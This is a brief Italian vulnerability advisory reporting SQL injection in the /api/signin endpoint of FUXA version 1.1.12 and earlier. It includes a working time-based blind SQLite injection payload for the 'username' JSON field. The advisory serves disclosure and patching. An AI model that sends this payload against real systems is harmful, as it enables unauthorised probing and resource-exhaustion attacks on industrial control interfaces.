
È possibile iniettare codice SQL nel parametro JSON "username" dell'endpoint /api/signin tramite una richiesta HTTP POST
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
Nome del prodotto interessato: FUXA
Versione interessata: <= 1.1.12
Problema: Iniezione SQL
Descrizione: È possibile iniettare codice SQL nel parametro JSON "username" dell'endpoint /api/signin tramite una richiesta HTTP POST.